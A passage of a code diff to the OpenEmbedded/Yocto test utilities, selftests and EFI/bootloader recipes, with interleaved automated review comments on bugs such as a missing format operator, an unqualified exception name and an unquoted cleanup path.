143 shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old") 143 shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old")
@@ -146,13 +146,13 @@ class SStateTests(SStateBase):
146 bitbake(['-cclean'] + targets) 146 bitbake(['-cclean'] + targets)
147 bitbake(targets) 147 bitbake(targets)
148 file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) 148 file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
149 self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) 149 self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
150 150
151 not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2] 151 not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2]
152 self.assertTrue(not_recreated == [], msg="The following sstate files ware not recreated: %s" % ', '.join(map(str, not_recreated))) 152 self.assertTrue(not_recreated == [], msg="The following sstate files were not recreated: %s" % ', '.join(map(str, not_recreated)))
153 153
154 created_once = [x for x in file_tracker_2 if x not in file_tracker_1] 154 created_once = [x for x in file_tracker_2 if x not in file_tracker_1]
155 self.assertTrue(created_once == [], msg="The following sstate files ware created only in the second run: %s" % ', '.join(map(str, created_once))) 155 self.assertTrue(created_once == [], msg="The following sstate files were created only in the second run: %s" % ', '.join(map(str, created_once)))
156 156
157 def test_rebuild_distro_specific_sstate_cross_native_targets(self): 157 def test_rebuild_distro_specific_sstate_cross_native_targets(self):
158 self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True) 158 self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True)
@@ -202,9 +202,9 @@ class SStateTests(SStateBase):
202 actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)] 202 actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)]
203 203
204 actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate] 204 actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate]
205 self.assertFalse(actual_not_expected, msg="Files should have been removed but ware not: %s" % ', '.join(map(str, actual_not_expected))) 205 self.assertFalse(actual_not_expected, msg="Files should have been removed but were not: %s" % ', '.join(map(str, actual_not_expected)))
206 expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate] 206 expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate]
207 self.assertFalse(expected_not_actual, msg="Extra files ware removed: %s" ', '.join(map(str, expected_not_actual))) 207 self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" ', '.join(map(str, expected_not_actual)))
208 208
209 def test_sstate_cache_management_script_using_pr_1(self): 209 def test_sstate_cache_management_script_using_pr_1(self):
210 global_config = [] 210 global_config = []
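Review bot: The `msg=` argument on new line 207 still has no `%` between the format string and `', '.join(...)`. The two adjacent literals are therefore concatenated and used as the join separator, so the failure message is just the file names glued together with that text instead of a prefixed list. The typo fix leaves this untouched; the line should read `self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" % ', '.join(map(str, expected_not_actual)))`. The enclosing method starts outside the hunk.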
diff --git a/meta/lib/oeqa/selftest/cases/tinfoil.py b/meta/lib/oeqa/selftest/cases/tinfoil.py
index a51c6048d3..6668d7cdc8 100644
--- a/meta/lib/oeqa/selftest/cases/tinfoil.py
+++ b/meta/lib/oeqa/selftest/cases/tinfoil.py
@@ -65,6 +65,20 @@ class TinfoilTests(OESelftestTestCase):
65 localdata.setVar('PN', 'hello') 65 localdata.setVar('PN', 'hello')
66 self.assertEqual('hello', localdata.getVar('BPN')) 66 self.assertEqual('hello', localdata.getVar('BPN'))
67 67
68 # The config_data API tp parse_recipe_file is used by:
69 # layerindex-web layerindex/update_layer.py
70 def test_parse_recipe_custom_data(self):
71 with bb.tinfoil.Tinfoil() as tinfoil:
72 tinfoil.prepare(config_only=False, quiet=2)
73 localdata = bb.data.createCopy(tinfoil.config_data)
74 localdata.setVar("TESTVAR", "testval")
75 testrecipe = 'mdadm'
76 best = tinfoil.find_best_provider(testrecipe)
77 if not best:
78 self.fail('Unable to find recipe providing %s' % testrecipe)
79 rd = tinfoil.parse_recipe_file(best[3], config_data=localdata)
80 self.assertEqual("testval", rd.getVar('TESTVAR'))
81
68 def test_list_recipes(self): 82 def test_list_recipes(self):
69 with bb.tinfoil.Tinfoil() as tinfoil: 83 with bb.tinfoil.Tinfoil() as tinfoil:
70 tinfoil.prepare(config_only=False, quiet=2) 84 tinfoil.prepare(config_only=False, quiet=2)
@@ -87,23 +101,22 @@ class TinfoilTests(OESelftestTestCase):
87 with bb.tinfoil.Tinfoil() as tinfoil: 101 with bb.tinfoil.Tinfoil() as tinfoil:
88 tinfoil.prepare(config_only=True) 102 tinfoil.prepare(config_only=True)
89 103
90 tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted']) 104 tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted', 'bb.command.CommandFailed', 'bb.command.CommandExit'])
91 105
92 # Need to drain events otherwise events that were masked may still be in the queue 106 # Need to drain events otherwise events that were masked may still be in the queue
93 while tinfoil.wait_event(): 107 while tinfoil.wait_event():
94 pass 108 pass
95 109
96 pattern = 'conf' 110 pattern = 'conf'
97 res = tinfoil.run_command('findFilesMatchingInDir', pattern, 'conf/machine') 111 res = tinfoil.run_command('testCookerCommandEvent', pattern, handle_events=False)
98 self.assertTrue(res) 112 self.assertTrue(res)
99 113
100 eventreceived = False 114 eventreceived = False
101 commandcomplete = False 115 commandcomplete = False
102 start = time.time() 116 start = time.time()
103 # Wait for maximum 60s in total so we'd detect spurious heartbeat events for example 117 # Wait for maximum 120s in total so we'd detect spurious heartbeat events for example
104 # The test is IO load sensitive too
105 while (not (eventreceived == True and commandcomplete == True) 118 while (not (eventreceived == True and commandcomplete == True)
106 and (time.time() - start < 60)): 119 and (time.time() - start < 120)):
107 # if we received both events (on let's say a good day), we are done 120 # if we received both events (on let's say a good day), we are done
108 event = tinfoil.wait_event(1) 121 event = tinfoil.wait_event(1)
109 if event: 122 if event:
@@ -111,14 +124,15 @@ class TinfoilTests(OESelftestTestCase):
111 commandcomplete = True 124 commandcomplete = True
112 elif isinstance(event, bb.event.FilesMatchingFound): 125 elif isinstance(event, bb.event.FilesMatchingFound):
113 self.assertEqual(pattern, event._pattern) 126 self.assertEqual(pattern, event._pattern)
114 self.assertIn('qemuarm.conf', event._matches) 127 self.assertIn('A', event._matches)
128 self.assertIn('B', event._matches)
115 eventreceived = True 129 eventreceived = True
116 elif isinstance(event, logging.LogRecord): 130 elif isinstance(event, logging.LogRecord):
117 continue 131 continue
118 else: 132 else:
119 self.fail('Unexpected event: %s' % event) 133 self.fail('Unexpected event: %s' % event)
120 134
121 self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server') 135 self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server (Matching event received: %s)' % str(eventreceived))
122 self.assertTrue(eventreceived, 'Did not receive FilesMatchingFound event from bitbake server') 136 self.assertTrue(eventreceived, 'Did not receive FilesMatchingFound event from bitbake server')
123 137
124 def test_setvariable_clean(self): 138 def test_setvariable_clean(self):
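Review bot: The event mask on new line 104 now lets `bb.command.CommandFailed` and `bb.command.CommandExit` through, but the visible part of the wait loop has no branch for them, so they would fall into the final `else` and be reported as `Unexpected event`. The first branch of the chain (new line 123) lies between the hunks, so this is inferred. If that branch only tests for `CommandCompleted`, an explicit `elif isinstance(event, (bb.command.CommandFailed, bb.command.CommandExit)): self.fail('Command did not complete: %s' % event)` would make the failure self-explanatory. The comment on new line 68 also has a typo, `tp` for `to`.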
diff --git a/meta/lib/oeqa/selftest/cases/wic.py b/meta/lib/oeqa/selftest/cases/wic.py
index 0435aa29c9..f7abdba015 100644
--- a/meta/lib/oeqa/selftest/cases/wic.py
+++ b/meta/lib/oeqa/selftest/cases/wic.py
@@ -905,14 +905,18 @@ class Wic2(WicTestCase):
905 @only_for_arch(['i586', 'i686', 'x86_64']) 905 @only_for_arch(['i586', 'i686', 'x86_64'])
906 def test_rawcopy_plugin_qemu(self): 906 def test_rawcopy_plugin_qemu(self):
907 """Test rawcopy plugin in qemu""" 907 """Test rawcopy plugin in qemu"""
908 # build ext4 and wic images 908 # build ext4 and then use it for a wic image
909 for fstype in ("ext4", "wic"): 909 config = 'IMAGE_FSTYPES = "ext4"\n'
910 config = 'IMAGE_FSTYPES = "%s"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n' % fstype 910 self.append_config(config)
911 self.append_config(config) 911 self.assertEqual(0, bitbake('core-image-minimal').status)
912 self.assertEqual(0, bitbake('core-image-minimal').status) 912 self.remove_config(config)
913 self.remove_config(config)
914 913
915 with runqemu('core-image-minimal', ssh=False, image_fstype='wic') as qemu: 914 config = 'IMAGE_FSTYPES = "wic"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n'
915 self.append_config(config)
916 self.assertEqual(0, bitbake('core-image-minimal-mtdutils').status)
917 self.remove_config(config)
918
919 with runqemu('core-image-minimal-mtdutils', ssh=False, image_fstype='wic') as qemu:
916 cmd = "grep sda. /proc/partitions |wc -l" 920 cmd = "grep sda. /proc/partitions |wc -l"
917 status, output = qemu.run_serial(cmd) 921 status, output = qemu.run_serial(cmd)
918 self.assertEqual(1, status, 'Failed to run command "%s": %s' % (cmd, output)) 922 self.assertEqual(1, status, 'Failed to run command "%s": %s' % (cmd, output))
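Review bot: The comment on new line 908 does not say why the ext4 image is built from `core-image-minimal` while the wic image is built and booted from `core-image-minimal-mtdutils`. Presumably `test_rawcopy_plugin.wks.in` raw-copies the `core-image-minimal` ext4 image, but the wks file is not visible here. A comment such as `# the wks file raw-copies the core-image-minimal ext4 image, so build that first and wrap it in a wic image of a different recipe` would record the dependency, once confirmed. The method body continues outside the hunk.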
diff --git a/meta/lib/oeqa/utils/buildproject.py b/meta/lib/oeqa/utils/buildproject.py
index e6d80cc8dc..dfb9661868 100644
--- a/meta/lib/oeqa/utils/buildproject.py
+++ b/meta/lib/oeqa/utils/buildproject.py
@@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta):
18 def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None): 18 def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None):
19 self.uri = uri 19 self.uri = uri
20 self.archive = os.path.basename(uri) 20 self.archive = os.path.basename(uri)
21 self.tempdirobj = None
21 if not tmpdir: 22 if not tmpdir:
22 self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-') 23 self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-')
23 tmpdir = self.tempdirobj.name 24 tmpdir = self.tempdirobj.name
@@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta):
57 return self._run('cd %s; make install %s' % (self.targetdir, install_args)) 58 return self._run('cd %s; make install %s' % (self.targetdir, install_args))
58 59
59 def clean(self): 60 def clean(self):
61 if self.tempdirobj:
62 self.tempdirobj.cleanup()
60 if not self.needclean: 63 if not self.needclean:
61 return 64 return
62 self._run('rm -rf %s' % self.targetdir) 65 self._run('rm -rf %s' % self.targetdir)
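Review bot: `clean()` still builds its command as `'rm -rf %s' % self.targetdir` (new line 65), so a path containing spaces or shell metacharacters would be split or interpreted if `_run` passes the string to a shell, which is presumably the case given the `cd %s; make install` usage above. `targetdir` is assembled outside the hunk, so how far it can vary is not visible. Quoting it with `self._run('rm -rf %s' % shlex.quote(self.targetdir))` (needs `import shlex`) removes that dependency. The same pattern is in `clean()` in meta/lib/oeqa/utils/targetbuild.py, where `subprocess.check_call('rm -f %s' % self.localarchive, shell=True)` can become `subprocess.check_call(['rm', '-f', self.localarchive])`. The new `tempdirobj.cleanup()` call also runs before the `needclean` early return, which deserves a one-line comment if that is intended.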
diff --git a/meta/lib/oeqa/utils/commands.py b/meta/lib/oeqa/utils/commands.py
index a71c16ab14..024261410e 100644
--- a/meta/lib/oeqa/utils/commands.py
+++ b/meta/lib/oeqa/utils/commands.py
@@ -174,11 +174,8 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
174 if native_sysroot: 174 if native_sysroot:
175 extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \ 175 extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \
176 (native_sysroot, native_sysroot, native_sysroot) 176 (native_sysroot, native_sysroot, native_sysroot)
177 extra_libpaths = "%s/lib:%s/usr/lib" % \
178 (native_sysroot, native_sysroot)
179 nenv = dict(options.get('env', os.environ)) 177 nenv = dict(options.get('env', os.environ))
180 nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '') 178 nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '')
181 nenv['LD_LIBRARY_PATH'] = extra_libpaths + ':' + nenv.get('LD_LIBRARY_PATH', '')
182 options['env'] = nenv 179 options['env'] = nenv
183 180
184 cmd = Command(command, timeout=timeout, output_log=output_log, **options) 181 cmd = Command(command, timeout=timeout, output_log=output_log, **options)
diff --git a/meta/lib/oeqa/utils/metadata.py b/meta/lib/oeqa/utils/metadata.py
index 8013aa684d..15ec190c4a 100644
--- a/meta/lib/oeqa/utils/metadata.py
+++ b/meta/lib/oeqa/utils/metadata.py
@@ -27,9 +27,9 @@ def metadata_from_bb():
27 data_dict = get_bb_vars() 27 data_dict = get_bb_vars()
28 28
29 # Distro information 29 # Distro information
30 info_dict['distro'] = {'id': data_dict['DISTRO'], 30 info_dict['distro'] = {'id': data_dict.get('DISTRO', 'NODISTRO'),
31 'version_id': data_dict['DISTRO_VERSION'], 31 'version_id': data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'),
32 'pretty_name': '%s %s' % (data_dict['DISTRO'], data_dict['DISTRO_VERSION'])} 32 'pretty_name': '%s %s' % (data_dict.get('DISTRO', 'NODISTRO'), data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'))}
33 33
34 # Host distro information 34 # Host distro information
35 os_release = get_os_release() 35 os_release = get_os_release()
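Review bot: `data_dict.get('DISTRO', 'NODISTRO')` on new lines 30-32 substitutes the default only when the key is absent. If `get_bb_vars()` returns the key with a `None` value for an unset variable (its implementation is not visible here), `pretty_name` still becomes `None None`. Reading each value once avoids that and the repeated defaults: `distro = data_dict.get('DISTRO') or 'NODISTRO'` and `distro_version = data_dict.get('DISTRO_VERSION') or 'NO_DISTRO_VERSION'`, then use the two locals in the dict. The body of `metadata_from_bb` continues outside the hunk.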
diff --git a/meta/lib/oeqa/utils/nfs.py b/meta/lib/oeqa/utils/nfs.py
index a37686c914..c9bac050a4 100644
--- a/meta/lib/oeqa/utils/nfs.py
+++ b/meta/lib/oeqa/utils/nfs.py
@@ -8,7 +8,7 @@ from oeqa.utils.commands import bitbake, get_bb_var, Command
8from oeqa.utils.network import get_free_port 8from oeqa.utils.network import get_free_port
9 9
10@contextlib.contextmanager 10@contextlib.contextmanager
11def unfs_server(directory, logger = None): 11def unfs_server(directory, logger = None, udp = True):
12 unfs_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "unfs3-native") 12 unfs_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "unfs3-native")
13 if not os.path.exists(os.path.join(unfs_sysroot, "usr", "bin", "unfsd")): 13 if not os.path.exists(os.path.join(unfs_sysroot, "usr", "bin", "unfsd")):
14 # build native tool 14 # build native tool
@@ -22,7 +22,7 @@ def unfs_server(directory, logger = None):
22 exports.write("{0} (rw,no_root_squash,no_all_squash,insecure)\n".format(directory).encode()) 22 exports.write("{0} (rw,no_root_squash,no_all_squash,insecure)\n".format(directory).encode())
23 23
24 # find some ports for the server 24 # find some ports for the server
25 nfsport, mountport = get_free_port(udp = True), get_free_port(udp = True) 25 nfsport, mountport = get_free_port(udp), get_free_port(udp)
26 26
27 nenv = dict(os.environ) 27 nenv = dict(os.environ)
28 nenv['PATH'] = "{0}/sbin:{0}/usr/sbin:{0}/usr/bin:".format(unfs_sysroot) + nenv.get('PATH', '') 28 nenv['PATH'] = "{0}/sbin:{0}/usr/sbin:{0}/usr/bin:".format(unfs_sysroot) + nenv.get('PATH', '')
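Review bot: The new `udp` parameter of `unfs_server` is undocumented, and no docstring for the function is visible in the hunks. A docstring should say that `udp` selects whether the two free ports are probed as UDP or TCP. It should also say that the export written on new line 22 is `rw,no_root_squash,no_all_squash,insecure` with no host restriction, so the server is only suitable for a test host. The unfsd command line is outside the hunks, so whether it switches to TCP-only when `udp=False` cannot be checked from here. Passing the flag by keyword, `get_free_port(udp=udp)`, would keep the call as readable as the line it replaces.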
diff --git a/meta/lib/oeqa/utils/qemurunner.py b/meta/lib/oeqa/utils/qemurunner.py
index 77ec939ad7..c84d299a80 100644
--- a/meta/lib/oeqa/utils/qemurunner.py
+++ b/meta/lib/oeqa/utils/qemurunner.py
@@ -70,6 +70,8 @@ class QemuRunner:
70 self.monitorpipe = None 70 self.monitorpipe = None
71 71
72 self.logger = logger 72 self.logger = logger
73 # Whether we're expecting an exit and should show related errors
74 self.canexit = False
73 75
74 # Enable testing other OS's 76 # Enable testing other OS's
75 # Set commands for target communication, and default to Linux ALWAYS 77 # Set commands for target communication, and default to Linux ALWAYS
@@ -118,7 +120,10 @@ class QemuRunner:
118 import fcntl 120 import fcntl
119 fl = fcntl.fcntl(o, fcntl.F_GETFL) 121 fl = fcntl.fcntl(o, fcntl.F_GETFL)
120 fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK) 122 fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK)
121 return os.read(o.fileno(), 1000000).decode("utf-8") 123 try:
124 return os.read(o.fileno(), 1000000).decode("utf-8")
125 except BlockingIOError:
126 return ""
122 127
123 128
124 def handleSIGCHLD(self, signum, frame): 129 def handleSIGCHLD(self, signum, frame):
@@ -229,7 +234,7 @@ class QemuRunner:
229 r = os.fdopen(r) 234 r = os.fdopen(r)
230 x = r.read() 235 x = r.read()
231 os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM) 236 os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM)
232 sys.exit(0) 237 os._exit(0)
233 238
234 self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid) 239 self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid)
235 self.logger.debug("waiting at most %s seconds for qemu pid (%s)" % 240 self.logger.debug("waiting at most %s seconds for qemu pid (%s)" %
@@ -427,12 +432,17 @@ class QemuRunner:
427 except OSError as e: 432 except OSError as e:
428 if e.errno != errno.ESRCH: 433 if e.errno != errno.ESRCH:
429 raise 434 raise
430 endtime = time.time() + self.runqemutime 435 try:
431 while self.runqemu.poll() is None and time.time() < endtime: 436 outs, errs = self.runqemu.communicate(timeout = self.runqemutime)
432 time.sleep(1) 437 if outs:
433 if self.runqemu.poll() is None: 438 self.logger.info("Output from runqemu:\n%s", outs.decode("utf-8"))
439 if errs:
440 self.logger.info("Stderr from runqemu:\n%s", errs.decode("utf-8"))
441 except TimeoutExpired:
434 self.logger.debug("Sending SIGKILL to runqemu") 442 self.logger.debug("Sending SIGKILL to runqemu")
435 os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL) 443 os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL)
444 if not self.runqemu.stdout.closed:
445 self.logger.info("Output from runqemu:\n%s" % self.getOutput(self.runqemu.stdout))
436 self.runqemu.stdin.close() 446 self.runqemu.stdin.close()
437 self.runqemu.stdout.close() 447 self.runqemu.stdout.close()
438 self.runqemu_exited = True 448 self.runqemu_exited = True
@@ -467,6 +477,11 @@ class QemuRunner:
467 self.thread.stop() 477 self.thread.stop()
468 self.thread.join() 478 self.thread.join()
469 479
480 def allowexit(self):
481 self.canexit = True
482 if self.thread:
483 self.thread.allowexit()
484
470 def restart(self, qemuparams = None): 485 def restart(self, qemuparams = None):
471 self.logger.warning("Restarting qemu process") 486 self.logger.warning("Restarting qemu process")
472 if self.runqemu.poll() is None: 487 if self.runqemu.poll() is None:
@@ -522,7 +537,9 @@ class QemuRunner:
522 if re.search(self.boot_patterns['search_cmd_finished'], data): 537 if re.search(self.boot_patterns['search_cmd_finished'], data):
523 break 538 break
524 else: 539 else:
525 raise Exception("No data on serial console socket") 540 if self.canexit:
541 return (1, "")
542 raise Exception("No data on serial console socket, connection closed?")
526 543
527 if data: 544 if data:
528 if raw: 545 if raw:
@@ -560,6 +577,7 @@ class LoggingThread(threading.Thread):
560 self.logger = logger 577 self.logger = logger
561 self.readsock = None 578 self.readsock = None
562 self.running = False 579 self.running = False
580 self.canexit = False
563 581
564 self.errorevents = select.POLLERR | select.POLLHUP | select.POLLNVAL 582 self.errorevents = select.POLLERR | select.POLLHUP | select.POLLNVAL
565 self.readevents = select.POLLIN | select.POLLPRI 583 self.readevents = select.POLLIN | select.POLLPRI
@@ -593,6 +611,9 @@ class LoggingThread(threading.Thread):
593 self.close_ignore_error(self.writepipe) 611 self.close_ignore_error(self.writepipe)
594 self.running = False 612 self.running = False
595 613
614 def allowexit(self):
615 self.canexit = True
616
596 def eventloop(self): 617 def eventloop(self):
597 poll = select.poll() 618 poll = select.poll()
598 event_read_mask = self.errorevents | self.readevents 619 event_read_mask = self.errorevents | self.readevents
@@ -638,7 +659,7 @@ class LoggingThread(threading.Thread):
638 data = self.readsock.recv(count) 659 data = self.readsock.recv(count)
639 except socket.error as e: 660 except socket.error as e:
640 if e.errno == errno.EAGAIN or e.errno == errno.EWOULDBLOCK: 661 if e.errno == errno.EAGAIN or e.errno == errno.EWOULDBLOCK:
641 return '' 662 return b''
642 else: 663 else:
643 raise 664 raise
644 665
@@ -649,7 +670,9 @@ class LoggingThread(threading.Thread):
649 # happened. But for this code it counts as an 670 # happened. But for this code it counts as an
650 # error since the connection shouldn't go away 671 # error since the connection shouldn't go away
651 # until qemu exits. 672 # until qemu exits.
652 raise Exception("Console connection closed unexpectedly") 673 if not self.canexit:
674 raise Exception("Console connection closed unexpectedly")
675 return b''
653 676
654 return data 677 return data
655 678
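Review bot: `except TimeoutExpired:` on new line 441 uses an unqualified name. Unless the file has `from subprocess import TimeoutExpired` (the import block is outside the hunks), the handler raises `NameError` exactly when runqemu fails to exit in time, and the SIGKILL is never sent. `except subprocess.TimeoutExpired:` works either way, assuming `subprocess` is imported as a module. In the visible lines the process is also not waited for after the SIGKILL, so a following `self.runqemu.wait()` would reap it; the enclosing method starts and ends outside the hunk. In `getOutput` (new lines 123-126), `.decode("utf-8")` can raise if a read ends mid-character, and `errors="replace"` would keep this logging path from failing.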
diff --git a/meta/lib/oeqa/utils/targetbuild.py b/meta/lib/oeqa/utils/targetbuild.py
index 1055810ca3..09738add1d 100644
--- a/meta/lib/oeqa/utils/targetbuild.py
+++ b/meta/lib/oeqa/utils/targetbuild.py
@@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta):
19 self.d = d 19 self.d = d
20 self.uri = uri 20 self.uri = uri
21 self.archive = os.path.basename(uri) 21 self.archive = os.path.basename(uri)
22 self.tempdirobj = None
22 if not tmpdir: 23 if not tmpdir:
23 tmpdir = self.d.getVar('WORKDIR') 24 tmpdir = self.d.getVar('WORKDIR')
24 if not tmpdir: 25 if not tmpdir:
@@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta):
71 return self._run('cd %s; make install %s' % (self.targetdir, install_args)) 72 return self._run('cd %s; make install %s' % (self.targetdir, install_args))
72 73
73 def clean(self): 74 def clean(self):
75 if self.tempdirobj:
76 self.tempdirobj.cleanup()
74 self._run('rm -rf %s' % self.targetdir) 77 self._run('rm -rf %s' % self.targetdir)
75 subprocess.check_call('rm -f %s' % self.localarchive, shell=True) 78 subprocess.check_call('rm -f %s' % self.localarchive, shell=True)
76 pass
77 79
78class TargetBuildProject(BuildProject): 80class TargetBuildProject(BuildProject):
79 81
diff --git a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
index 5d6f200a73..e9dfa0770e 100644
--- a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
+++ b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
@@ -10,7 +10,7 @@ DEPENDS = "efivar popt"
10 10
11COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" 11COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
12 12
13SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \ 13SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \
14 file://0001-remove-extra-decl.patch \ 14 file://0001-remove-extra-decl.patch \
15 file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \ 15 file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \
16 " 16 "
diff --git a/meta/recipes-bsp/efivar/efivar/determinism.patch b/meta/recipes-bsp/efivar/efivar/determinism.patch
new file mode 100644
index 0000000000..bdf6bfc4a8
--- /dev/null
+++ b/meta/recipes-bsp/efivar/efivar/determinism.patch
@@ -0,0 +1,18 @@
1Fix reproducibility issue caused by unsorted wildcard expansion.
2
3Upstream-Status: Pending
4RP 2021/3/1
5
6Index: git/src/Makefile
7===================================================================
8--- git.orig/src/Makefile
9+++ git/src/Makefile
10@@ -15,7 +15,7 @@ TARGETS=$(LIBTARGETS) $(BINTARGETS) $(PC
11 STATICTARGETS=$(STATICLIBTARGETS) $(STATICBINTARGETS)
12
13 LIBEFIBOOT_SOURCES = crc32.c creator.c disk.c gpt.c loadopt.c path-helpers.c \
14- linux.c $(wildcard linux-*.c)
15+ linux.c $(sort $(wildcard linux-*.c))
16 LIBEFIBOOT_OBJECTS = $(patsubst %.c,%.o,$(LIBEFIBOOT_SOURCES))
17 LIBEFIVAR_SOURCES = dp.c dp-acpi.c dp-hw.c dp-media.c dp-message.c \
18 efivarfs.c error.c export.c guid.c guids.S guid-symbols.c \
diff --git a/meta/recipes-bsp/efivar/efivar_37.bb b/meta/recipes-bsp/efivar/efivar_37.bb
index 9b95721a4e..858c61ae6a 100644
--- a/meta/recipes-bsp/efivar/efivar_37.bb
+++ b/meta/recipes-bsp/efivar/efivar_37.bb
@@ -7,7 +7,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393"
7 7
8COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" 8COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
9 9
10SRC_URI = "git://github.com/rhinstaller/efivar.git \ 10SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=main;protocol=https \
11 file://determinism.patch \
11 file://no-werror.patch" 12 file://no-werror.patch"
12SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10" 13SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10"
13 14
diff --git a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
index 9954d7f57a..191b0bc176 100644
--- a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
+++ b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Libraries for producing EFI binaries" 1SUMMARY = "Libraries for producing EFI binaries"
2HOMEPAGE = "http://sourceforge.net/projects/gnu-efi/" 2HOMEPAGE = "http://sourceforge.net/projects/gnu-efi/"
3DESCRIPTION = "GNU-EFI aims to Develop EFI applications for ARM-64, ARM-32, x86_64, IA-64 (IPF), IA-32 (x86), and MIPS platforms using the GNU toolchain and the EFI development environment."
3SECTION = "devel" 4SECTION = "devel"
4LICENSE = "GPLv2+ | BSD-2-Clause" 5LICENSE = "GPLv2+ | BSD-2-Clause"
5LIC_FILES_CHKSUM = "file://gnuefi/crt0-efi-arm.S;beginline=4;endline=16;md5=e582764a4776e60c95bf9ab617343d36 \ 6LIC_FILES_CHKSUM = "file://gnuefi/crt0-efi-arm.S;beginline=4;endline=16;md5=e582764a4776e60c95bf9ab617343d36 \
diff --git a/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
new file mode 100644
index 0000000000..eaaa7effae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
@@ -0,0 +1,39 @@
1From 0900f11def2e7fbb4880efff0cd9c9b32f1cdb86 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 3 Dec 2020 14:39:45 +0000
4Subject: [PATCH] mmap: Fix memory leak when iterating over mapped memory
5
6When returning from grub_mmap_iterate() the memory allocated to present
7is not being released causing it to leak.
8
9Fixes: CID 96655
10
11Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
12Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8cb2848f9699642a698af84b12ba187cab722031]
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/mmap/mmap.c | 2 ++
18 1 file changed, 2 insertions(+)
19
20diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
